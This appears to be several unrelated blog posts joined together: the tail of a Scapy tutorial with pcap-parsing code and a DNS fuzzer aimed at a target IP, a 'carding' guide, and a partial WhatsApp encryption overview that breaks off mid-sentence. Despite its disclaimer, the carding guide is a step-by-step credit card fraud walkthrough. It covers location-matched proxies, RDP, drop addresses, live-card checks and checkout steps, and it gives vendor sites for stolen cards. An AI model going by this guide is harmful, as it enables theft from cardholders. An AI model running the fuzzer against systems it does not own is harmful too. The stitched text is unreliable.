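

def read_pcap(path):
    """Equivalent of rdpcap(): the list of raw frames, with every length checked."""
    frames = []
    with open(path, "rb") as f:
        header = f.read(24)
        if len(header) < 24:
            raise ValueError("truncated pcap header")
        magic = struct.unpack("<I", header[:4])[0]
        if magic == PCAP_MAGIC:
            endian = "<"
        elif magic == 0xD4C3B2A1:
            endian = ">"                  # file written on a big-endian host
        else:
            raise ValueError("not a pcap file")
        if struct.unpack(endian + "IHHiIII", header)[6] != LINKTYPE_ETHERNET:
            raise ValueError("only Ethernet captures are handled here")
        while True:
            rec = f.read(16)
            if len(rec) < 16:
                break
            incl_len = struct.unpack(endian + "IIII", rec)[2]
            data = f.read(incl_len)
            if len(data) < incl_len:
                raise ValueError("truncated record")
            frames.append(data)
    return frames


def arp_monitor(frame):
    """Mirror of arp_monitor_callback(): 'hwsrc psrc' for who-has/is-at, else None."""
    if len(frame) < 14 + 28 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _tha, _tpa = struct.unpack_from(ARP_FMT, frame, 14)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4) or op not in (1, 2):
        return None
    return "%s %s" % (mac_str(sha), socket.inet_ntoa(spa))


def demo(path=None):
    """Write two ARP frames plus one IPv4 filler frame, read back, return the monitor lines."""
    frames = [
        build_arp_frame(1, "00:50:56:c0:00:08", "192.168.118.1", "00:00:00:00:00:00", "192.168.118.130"),
        build_arp_frame(2, "00:0c:29:d8:b6:4d", "192.168.118.130", "00:50:56:c0:00:08", "192.168.118.1"),
        mac_bytes("00:50:56:c0:00:08") + mac_bytes("00:0c:29:d8:b6:4d")
        + struct.pack("!H", 0x0800) + b"\x45" + b"\x00" * 41,   # not ARP: must be skipped
    ]
    own_file = path is None
    if own_file:
        fd, path = tempfile.mkstemp(suffix=".pcap")
        os.close(fd)
    try:
        write_pcap(path, frames)
        return [line for line in map(arp_monitor, read_pcap(path)) if line]
    finally:
        if own_file:
            os.unlink(path)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The file demo() writes is a plain pcap, so it can be opened in Wireshark or fed to rdpcap() to compare with Scapy's own parsing; read_pcap() refuses a truncated record rather than returning a short frame, which is the check a capture parser needs before trusting the length field.<br />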
Let’s see how we can create a simple DNS fuzzer using the fuzz function demonstrated in the description above.<br />
<pre>#!/usr/bin/env python
# import the sys module for the command line argument
import sys
# import scapy as a library
from scapy.all import *

if len(sys.argv) != 2:
    print("Usage: ./dnsfuzzer.py TARGET_IP")
    sys.exit(1)

# fuzz dns: every DNS() field left unset is filled with a random value on each send
while True:
    sr(IP(dst=sys.argv[1])/UDP()/fuzz(DNS()), inter=1, timeout=1)
</pre>
Sample output of the DNS fuzzer created using Scapy:<br />
<strong>root@bt:~/Desktop# ./dnsfuzzer.py 192.168.118.1<br />
</strong><br />
<strong>WARNING: No route found for IPv6 destination :: (no default route?)<br />
</strong><br />
<strong>Begin emission:<br />
</strong><br />
<strong>.Finished to send 1 packets.<br />
</strong><br />
<strong>Received 1 packets, got 0 answers, remaining 1 packets<br />
</strong><br />
<strong>Begin emission:<br />
</strong><br />
<strong>Finished to send 1 packets.<br />
</strong><br />
<strong>Received 0 packets, got 0 answers, remaining 1 packets<br />
</strong><br />
<strong>Begin emission:<br />
</strong><br />
<strong>Finished to send 1 packets.<br />
</strong><br />
<strong>Received 0 packets, got 0 answers, remaining 1 packets<br />
</strong><br />
<strong>[…]<br />
</strong><br />
The output of all the sample programs is shown in figure 7.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO7.png" /><br />
<div style="text-align: center;">
Figure 7. Programs using Scapy</div>
There are many other third-party libraries available for packet
manipulation in Python, like Pcapy, pypcap, dpkt, etc., yet Scapy turns
out to be one of the simplest to use and integrate into Python code and
hence is widely used. There are many other functionalities provided by
Scapy, which individually might seem very simple, but once they are all
woven together, they offer capabilities which no other tool
provides.<br />
<strong>Conclusion<br />
</strong><br />
We saw that Scapy is very powerful yet easy to use. Scapy is actually
not a replacement for tools like Nmap, tcpdump or p0f. These tools are
developed for specific needs and they all perform their functions very
well. During a quick security assessment they come in handy and provide
us the desired result, but sometimes we need the raw output, without
any interpretation, so that we can analyze it and make decisions for
ourselves. For example, if we need to check whether the system we are
probing is actually a honeypot, or to test how a firewall/IDP/IPS
behaves for different types of custom packets, then tools like Scapy are
very useful.<br />
The best thing about Scapy is that we can also use it as a Python
library, which allows us to create networking tools very quickly without
going into the details of creating raw packets from scratch, which
considerably reduces the size of the code. It simply allows us to try
anything we can imagine over a network. The built-in functions like fuzz,
sniff, traceroute, arping, etc. remove the need for different tools
for different functions and integrate them all into a single package.</div>
Introduction to carding (published 2016-12-13)<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
<span style="color: red;">Disclaimer:</span></h1>
<span style="color: red;">
</span><em><span style="color: red;">The Article writer’s intent is to spread awareness about the
carding. The writer is not responsible if any damage occurs. This is for
educational purpose only.</span><br />
</em><br />
Hello Guys, if you were a victim of carding fraud or really want to
understand what is Carding and how it should be done then here I
prepared the document which will clear the basic understanding.<br />
Points I cover:<br />
<ol>
<li>What is carding?</li>
<li>What are the factors relates to carding?</li>
<li>How it’s done, I mean process?</li>
<li>Precautionary measures Carder should take.</li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar1.jpg" /></div>
<h1>
Overview:</h1>
Nowadays, if we see the credit card fraud trend, it is being
increased day by day and new techniques being discovered to hack the
credit card info and use it for malicious purpose.<br />
As everything goes cashless, the use of a credit card will be
necessary for everyone. This is reason people should be aware of how
carding fraud is done and learn how to become not to become a <span style="text-decoration: underline;">victim</span>.<br />
There are so many ways to get the credit card details available on
the internet through Darknet sites as well as on TOR sites (Data Leak
.etc.).<br />
My aim is to spread awareness about carding, what is it, how the carder does it, etc.<br />
I have referred many articles, sites and basic documentation which I
feel will be useful to share it with you. I want the normal user to be
aware of carding methods so they can be alert to it.<br />
As we can see on social media sites and groups, most of the carders
provide the offers which are collected from Online Sites and groups for
your reference:<br />
Be aware that you should never contact a ripper. A <strong>Ripper</strong> is a fraud who takes the money and never deliver the product.<br />
<div style="text-align: center;">
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 251px;"></col>
<col style="width: 251px;"></col>
<col style="width: 251px;"></col></colgroup>
<tbody valign="top">
<tr>
<td colspan="2" style="padding-left: 9px; padding-right: 9px;" valign="middle">
<div style="text-align: center;">
<span style="font-size: 10pt;"><strong>Offer on Facebook group</strong></span></div>
</td>
<td style="padding-left: 9px; padding-right: 9px;" valign="middle">
<div style="text-align: center;">
<span style="font-size: 10pt;"><strong>Offer on WhatsApp group</strong></span></div>
</td>
</tr>
<tr>
<td colspan="2" style="padding-left: 9px; padding-right: 9px;"><img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar2.jpg" /></td>
<td style="padding-left: 9px; padding-right: 9px;"><img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar3.jpg" /></td>
<td style="padding-left: 9px; padding-right: 9px;"><img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar4.jpg" /></td>
</tr>
</tbody>
</table>
</div>
Let’s start with the basics.<br />
<ol>
<li><strong>Introduction to Carding and Key Points:<br />
</strong></li>
</ol>
There are multiple definitions available per different views.<br />
<strong>Carding</strong> itself is defined as the illegal use of the card (Credit/Debit) by unauthorized people (carder) to buy a product.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar5.jpg" /></div>
<h2>
1.1 Key points in carding method.</h2>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar6.jpg" /></div>
<h1>
2. Let start to understand each point one by one.</h1>
<h2>
2.1 Computer (PC):</h2>
For doing carding always use a computer. I know some methods using a
mobile device, but it is less secure and involves more risk.<br />
<h2>
2.2 SOCKS:</h2>
SOCKS stands for <strong>SOCK</strong>et <strong>S</strong>ecure. It
is internet protocol which allows client and server traffic pass through
a proxy server, so real IP is getting hidden and proxy IP get
reflected.<br />
This is useful while carding because carder wants to use the credit card holder’s location while doing it.<br />
Users can buy SOCKS.<br />
<h2>
2.3 Mac Address Changer:</h2>
MAC stands for Media Access Control. It is the unique address of every Network Interface Card (NIC).<br />
A MAC address changer allows you to change the MAC address of NIC instantly. It is required to be anonymous and safe.<br />
<h2>
2.4 CCleaner:</h2>
It is very useful tool help in cleaning your browsing history, cookies, temp files, etc.<br />
Many people ignore this part and get caught, so be careful and don’t forget to use it.<br />
<h2>
2.5 RDP (Remote Desktop Protocol):</h2>
RDP allows one computer to connect to another computer within the network. It is protocol developed by Microsoft.<br />
Basically, carders use it to connect to computers of the geolocation
of the person whose credit card carder want to use. It is used for
safety and stay anon. Here carders using others’ PC for doing carding
instead of their own.<br />
<h2>
2.6 DROP:</h2>
DROP is an address which the carder uses for the shipping address in the carding process.<br />
Let me explain in details with an example:<br />
If I am carding with US credit card, then I use USA address as
shipping address then my order will be shipped successfully, and I will
be safe. If you have relatives/friends, then no problem, otherwise use
sites who provide drop services only we have to pay extra for shipping
it.<br />
<h2>
2.7 credit card (Credit Card):</h2>
This part is very much important so read it carefully. Any credit card it is in the following format:<br />
| credit card Number |Exp Date| CVV2 code | Name on the Card |
Address | City | State | Country | Zip code | Phone # (sometimes not
included depending on where you get your credit card from)|<br />
e.g.: (randomly taken number/details)<br />
<span style="color: #ffc000;">| 4305873969346315 | 05 | 2018 | 591 | UNITED STATES | John Mechanic | 201<br />
</span><br />
<span style="color: #ffc000;">Stone Wayne Lane | Easternton | MA | 01949 |<br />
</span><br />
<strong>Types of Credit Card:<br />
</strong><br />
Every Credit card company starts their credit card number with a unique number to identify individually like shown below<br />
<strong>American Express (AMEX Card) – 3<br />
</strong><br />
<strong>Visa Card – 4<br />
</strong><br />
<strong>Master Card – 5<br />
</strong><br />
<strong>Discover (Disco) – 6<br />
</strong><br />
<strong>Company wise credit card details:<br />
</strong><br />
<h3>
Visa</h3>
<ol style="margin-left: 45pt;">
<li>Classic: The Card is used worldwide in any locations designated by
Visa, including ATMs, real and virtual Stores, and shops offering goods
and services by mail and telephone.</li>
<li>Gold – This card has a higher limit capacity. Most used card and adopted worldwide.</li>
<li>Platinum – Card is having limits over $10,000.</li>
<li>Signature – No preset spending limit – great bin to get</li>
<li>Infinite – Most prestigious card with having virtually no limit.
There is less in circulation so be alert when buying these. Use only
with reputable sellers!</li>
<li>Business – it can be used for small to medium sized businesses, usually has a limit.</li>
<li>Corporate – it can be used with medium to large size businesses, having more limit than a Business card.</li>
<li>Black – It has limited membership. It has no limit only having $500 annual fee, high-end card.</li>
</ol>
<h3>
MasterCard</h3>
<ol style="margin-left: 45pt;">
<li>Standard – it is same as classic visa card.</li>
<li>Gold – it is same as visa gold card.</li>
<li>Platinum – it is same as visa platinum card</li>
<li>World – it has a very high limit.</li>
<li>World Elite – it is virtually no limit, high-end card.</li>
</ol>
<h3>
Amex Card</h3>
<ol>
<li>Gold – it usually has around a 10k limit.</li>
<li>Platinum- is usually has a higher limit (around 35k).</li>
<li>Centurion – it has a High limit (75k+). It is also known as the black card, note: do not confuse with visa black card.</li>
</ol>
<h1>
Now we can start with some of the questionnaire and Basic concepts before start practical process of Carding.</h1>
<strong>Q1. What is BIN?<br />
</strong><br />
It is known as Bank Identification Number (BIN). It is a 6-digit number e.g.: 431408.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar7.jpg" /></div>
Some of the reference sites which give BIN info which I also refer:<br />
<a href="http://www.bins.pro/">www.bins.pro</a><br />
<a href="http://www.binlists.com/">www.binlists.com</a><br />
<a href="http://www.exactbins.com/">www.exactbins.com</a><br />
Simply go to the site (<a href="http://www.bins.pro/">www.bins.pro</a>) → enter BIN number and click on find to get the details. I have added first 4 digits only.<br />
You can filter out the option as per requirement shown below<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar8.png" /></div>
We got most of the information from the site. Now the question is how
to know the balance of CC. is it possible? and answer is Yes, I will
let you know step by step using normal as well as Skype method :)<br />
<strong>Q2. What is the meaning of VBV, NON VBV and MSC?<br />
</strong><br />
VBV (Verified by Visa) – Extra level protection is added by Visa to protect the Card from fraud.<br />
Like DOB, password, Social Security Number and Mother’s name, etc.
also sending OTP (one-time password) as extra security level to card
owner mobile number to validate the transaction.<br />
NON VBV (Verified by Visa) –Handy to use. No need extra information as specified in VBV card while doing the transaction.<br />
Note it down (IMP)- Carders mainly buy and use NON VBV cards for carding.<br />
MSC (MasterCard Secure Code) – security level same as VBV card.<br />
<strong>Q3. What is AVS?<br />
</strong><br />
It stands for Address Verification System<br />
It is the system which is used to identify the credit card holder
original address with billing address provided by the user while
shopping or online transaction.<br />
The system is used to identify the online fraud over the internet.<br />
<strong>Q4. How to check credit card is live or dead?<br />
</strong><br />
There are many sites available on the internet to verify credit card
is live or dead, but they charge for it approx. $0.001 (price may vary).
Also, 80% websites kill the credit card so never use it.<br />
There are tools also available on the internet to check the credit
card status, but most of them are a backdoor or Trojan so prefer not to
use it.<br />
As such there is no easy method to check it. Carder uses own ways to find it out. One of the ways is…<br />
Most carder go to Porn sites, buy a membership and confirm the credit card is live and proceed with carding.<br />
<strong>Q5. How to check the credit card is live or dead? (Skype Method)<br />
</strong><br />
(Note: method is posted on March 16)<br />
Login into Skype account and call on Magic number +18005xx5633
(masked). You will connect to voice mail (lady’s voice). Start by
entering the credit card number, and voice mail lady will stop
automatically.<br />
After that enter Expiry date of a card like 01 16 (mm: yy format).<br />
If your credit card is live then voice mail lady will speak like
“Thank you for calling, we really appreciate your business, since u are a
1st-time caller we would like to connect you .. blah blah” then just
hang the call.<br />
But if the credit card is used and voice mail lady speak like “Ohh
I’m sorry please re-enter your credit card number now” then the card is
dead. You can repeat the same process as many time you want.<br />
Note: You need a good internet connection for Skype calls.<br />
<strong>Q6. What is Bill=ship/Bill=CC/Ship=your Address?<br />
</strong><br />
Kindly pay attention here as it is also the main portion in carding
process. Any mistake will cancel the order and id get blocked.<br />
BILL=SHIP (Billing address: Shipping address)<br />
Take a scenario of normal online shopping scenario, when you are
doing carding you will use billing address and shipping address are
same. Means in both u will use your address. No need to use credit card
address.<br />
Bill=Shipping address, Ship=your address<br />
When you are doing carding, you will use credit card holder address
as your billing address, and shipping address will be your address. Most
sites use this method.<br />
<h1>
Now we cleared basic concepts and start with the actual process of carding.</h1>
<h2>
Setup SOCKS proxy in Firefox:</h2>
Follow the steps → open Firefox → go to options → advanced options → network →<br />
A pop-up will come. It will show options<br />
No proxy 2. Auto Detect 3. Use system proxy 4. Manual proxy configuration<br />
Select manual proxy configuration. Enter socks host: <<proxy
ip>> and port: <<proxy port>> e.g.:
141.141.141.141: 8080. Press ok and restart Firefox. Now you are
connected to secure Socks5 :)<br />
Note: when you buy a socks always match with credit card holder
address. If credit card holder is from California, USA then try to get
SOCKS5 at least matching state, country :)<br />
Guys now time to start the Carding process. Kindly follow the steps:<br />
<ol>
<li>Create the email id matching with credit card holder name. If his
name is John Cena ( the random name was taken), then email id should be <a href="mailto:johncena92@gmail.com">johncena92@gmail.com</a> or near about.</li>
<li>Now Run RDP and connect to the credit card holder location system to
proceed. If you didn’t have RDP, then follow following steps.</li>
<li>Open MAC changer and change the address randomly.</li>
<li>Run CCleaner and clean all the unwanted data (cookies/history/temp data etc.).</li>
<li>Setup SOCKS5 proxy in Firefox. <<Already explained>>.</li>
<li>Be sure to use SOCK5 is matching to the location of credit card
holder and be aware not to use blacklisted IP. Check with
www.check2ip.com</li>
<li>Open the site for shopping. I want to recommend a website shop from
your country because you don`t need to wait a lot for your package.</li>
<li>Register with credit card holder information (John Cena), name, country, city, address, and email.</li>
<li>Shop and choose your item and add to cart. Precaution: Select item not more than $500 at first step.</li>
<li>In shipping address add your address or drop address where the product is going to deliver.</li>
<li>Then go to the payment page and choose payment method like a credit card.</li>
<li>Enter all details of credit card manually because most of site having copy paste detector script.</li>
<li>Finally, in billing address add credit card owner address info and then proceed with the payment process.</li>
<li>If everything all right then the order will get successfully placed.</li>
<li>Once the order arrives at the shipping address, receive it from delivery boy.</li>
<li>(Few carder arrange fake id if delivery boy ask for proof).</li>
</ol>
<strong>Carding method using mobile:<br />
</strong><br />
Extra pro carder uses mobile for doing carding. If you followed steps carefully, you would also do that.<br />
<strong>Basic requirement:<br />
</strong><br />
<ol>
<li>Require rooted Android mobile.</li>
<li>Install few application require for carding (proxy apps, CCleaner, IMEI changer, Photo and Android ID changer).</li>
<li>You can use any VPN for carding I recommend HMA or Zen mate.</li>
<li>You can use SOCKS5 proxy with proxy droid apps.</li>
<li>Also, proceed with IMEI and Android ID changer and do it.</li>
<li>Now connect with proxy droid with SOCKS5 proxy and connect it.</li>
<li>Now follow all the steps explained above :)</li>
</ol>
<strong>Reference sites:<br />
</strong><br />
CC from shop <span style="font-family: Wingdings;">à</span> www.validcc.su<br />
Buy SOCKS from <span style="font-family: Wingdings;">à</span> www.vip72.com<br />
Download CCleaner software <span style="font-family: Wingdings;">à</span> www.piriform.com/ccleaner<br />
Download MAC address changer <span style="font-family: Wingdings;">à</span> www.zokali.com/win7-mac-addresschanger<br />
Download SOCKS checker <span style="font-family: Wingdings;">à</span> www.socksproxychecker.com<br />
<ul style="margin-left: 54pt;">
<li>
<div>
Acronyms:</div>
<ul>
<li>BIN: Bank Identification Number</li>
<li>CC: Credit Card</li>
<li>CCN: Credit Card Number</li>
<li>CVV/CVV2: Credit Verification Value (Card Security Code)</li>
<li>SSN: Social Security Number</li>
<li>MMN: Mother Maiden Name</li>
<li>DOB: Date Of Birth</li>
<li>COB: Change of Billing</li>
<li>VBV: Verified by Visa</li>
<li>MCSC: MasterCard Secure Code</li>
<li>POS: Point of Sale</li>
<li>VPN: Virtual Private Network</li>
<li>BTC: Bitcoin</li>
</ul>
</li>
<li>Personal Advice:</li>
</ul>
<ol style="margin-left: 72pt;">
<li>Normal users: Keep your credit card safe hands. Keep changing the
credit card PIN on a monthly basis. Do not make the online transaction
from unknown system/mobile.</li>
<li>Who want to learn carding – I observed many of the newcomers try to
be smart and got ripped multiple times. Don’t do it, it’s finally your
loss.</li>
<li>Carding is Illegal activity. Do not do it. If get caught, then, you will be in trouble.</li>
<li>Be safe and have fun :)</li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar9.png" /></div>
</div>
<h1>
WhatsApp Encryption Part-1: Weakness and Attack Vectors</h1>
Published 2016-09-16 by Anonymous.<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIDA2JgsElctHCCdJN8CR1aqizEKcexurQLpRrSy4DQ6acwqnrmhunN4FNZ7mXFSi2226uJyLv1fgBFVt3Sk7fqusSS4ev07pOYJ07CXJHQQHMY17mLQ26_mB7_NRfjJmNZo9mkpduwHE/s1600/WhatsApp-Spy-735x400.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIDA2JgsElctHCCdJN8CR1aqizEKcexurQLpRrSy4DQ6acwqnrmhunN4FNZ7mXFSi2226uJyLv1fgBFVt3Sk7fqusSS4ev07pOYJ07CXJHQQHMY17mLQ26_mB7_NRfjJmNZo9mkpduwHE/s400/WhatsApp-Spy-735x400.jpg" width="400" /></a></span></div>
<div style="text-align: justify;">
This provides a technical explanation of WhatsApp’s end-to-end encryption system.</div>
<div style="text-align: justify;">
WhatsApp Messenger allows people to exchange messages (including chats, group chats, images, videos, voice messages and files) and make WhatsApp calls around the world. WhatsApp messages and calls between a sender and receiver that use WhatsApp client software released after March 31, 2016 are end-to-end encrypted.</div>
<div style="text-align: justify;">
The Signal protocol, designed by Open Whisper Systems, is the basis for WhatsApp’s end-to-end encryption. This end-to-end encryption protocol is designed to prevent third parties and WhatsApp from having plaintext access to messages or calls. What’s more, even if encryption keys from a user’s device are ever physically compromised, they cannot be used to go back in time to decrypt previously transmitted messages.</div>
<div style="text-align: justify;">
This document gives an overview of the Signal protocol and its use in WhatsApp.</div>
<br />
<h3>
Public Key Types</h3>
<ul>
<li><strong>Identity Key Pair</strong> – A long-term Curve25519 key pair, generated at install time.</li>
<li><strong>Signed Pre Key</strong> – A medium-term Curve25519 key pair, generated at install time, signed by the Identity Key, and rotated on a periodic timed basis.</li>
<li><strong>One-Time Pre Keys</strong> – A queue of Curve25519 key pairs for one-time use, generated at install time, and replenished as needed.</li>
</ul>
<h3>
Session Key Types</h3>
<ul>
<li><strong>Root Key</strong> – A 32-byte value that is used to create Chain Keys.</li>
<li><strong>Chain Key</strong> – A 32-byte value that is used to create Message Keys.</li>
<li><strong>Message Key</strong> – An 80-byte value that is used to encrypt message contents. 32 bytes are used for an AES-256 key, 32 bytes for an HMAC-SHA256 key, and 16 bytes for an IV.</li>
</ul>
<br />
<h2>
Client Registration</h2>
<div style="text-align: justify;">
At registration time, a WhatsApp client transmits its public Identity Key, public Signed Pre Key (with its signature), and a batch of public One-Time Pre Keys to the server. The WhatsApp server stores these public keys associated with the user’s identifier. At no time does the WhatsApp server have access to any of the client’s private keys.</div>
<h3>
Initiating Session Setup</h3>
<div style="text-align: justify;">
To communicate with another WhatsApp user, a WhatsApp client first needs to establish an encrypted session. Once the session is established, clients do not need to rebuild a new session with each other until the existing session state is lost through an external event such as an app reinstall or device change.</div>
To establish a session:<br />
<ol>
<li>The initiating client (“initiator”) requests the public Identity Key, public Signed Pre Key, and a single public One-Time Pre Key for the recipient.</li>
<li>The server returns the requested public key values. A One-Time Pre Key is only used once, so it is removed from server storage after being requested. If the recipient’s latest batch of One-Time Pre Keys has been consumed and the recipient has not replenished them, no One-Time Pre Key will be returned.</li>
<li>The initiator saves the recipient’s Identity Key as I<sub>recipient</sub>, the Signed Pre Key as S<sub>recipient</sub>, and the One-Time Pre Key as O<sub>recipient</sub>.</li>
<li>The initiator generates an ephemeral Curve25519 key pair, E<sub>initiator</sub>.</li>
<li>The initiator loads its own Identity Key as I<sub>initiator</sub>.</li>
<li>The initiator calculates a master secret as master_secret = ECDH(I<sub>initiator</sub>, S<sub>recipient</sub>) || ECDH(E<sub>initiator</sub>, I<sub>recipient</sub>) || ECDH(E<sub>initiator</sub>, S<sub>recipient</sub>) || ECDH(E<sub>initiator</sub>, O<sub>recipient</sub>). If there is no One-Time Pre Key, the final ECDH is omitted.</li>
<li>The initiator uses HKDF to create a Root Key and Chain Keys from the master_secret.</li>
</ol>
<h3>
Receiving Session Setup</h3>
<div style="text-align: justify;">
After building a long-running encryption session, the initiator can immediately start sending messages to the recipient, even if the recipient is offline. Until the recipient responds, the initiator includes the information (in the header of all messages sent) that the recipient requires to build a corresponding session. This includes the initiator’s E<sub>initiator</sub> and I<sub>initiator</sub>.</div>
<!--EndFragment--><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">When the recipient receives a message that includes session setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">information:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The recipient calculates the corresponding <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret <span style="color: #59595c; font-style: normal; font-variant: normal;">using<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">its own private keys and the public keys advertised in the header of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the incoming message .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The recipient deletes the <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">used by the initiator .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . 
The initiator uses HKDF to derive a corresponding <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Exchanging Messages<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Once a session has been established, clients exchange messages<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">that are protected with a <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">using <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">in CBC<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">mode for encryption and <span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256 <span style="color: #59595c; font-style: normal; font-variant: normal;">for authentication .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">changes for each message transmitted, and is ephemeral, such that the <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">used to<br /><span style="color: #59595c; font-style: normal; 
font-variant: normal;">encrypt a message cannot be reconstructed from the session<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">state after a message has been transmitted or received .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is derived from a sender’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">that<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">“ratchets” forward with every message sent. Additionally, a new ECDH<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">agreement is performed with each message roundtrip to create a new<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> . 
This provides forward secrecy through the combination<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">of both an immediate “hash ratchet” and a round trip “DH ratchet.”<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Calculating a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Message Key <span style="color: #39bca8; font-style: normal; font-variant: normal;">from a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Chain Key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Each time a new <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is needed by a<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">message sender, it is calculated as:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key = HMAC-SHA256(Chain Key, 0x01)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . 
The <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is then updated as <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key =<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256(Chain Key, 0x02)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This causes the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">to “ratchet” forward, and<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">also means that a stored <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">can’t be used to<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">derive current or past values of the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Calculating a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Chain Key <span style="color: #39bca8; font-style: normal; font-variant: normal;">from a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Root Key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Each time a message is transmitted, an ephemeral <span style="color: #59595c; font-style: normal; font-variant: normal;">Curve25519<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">public key is advertised along with it. 
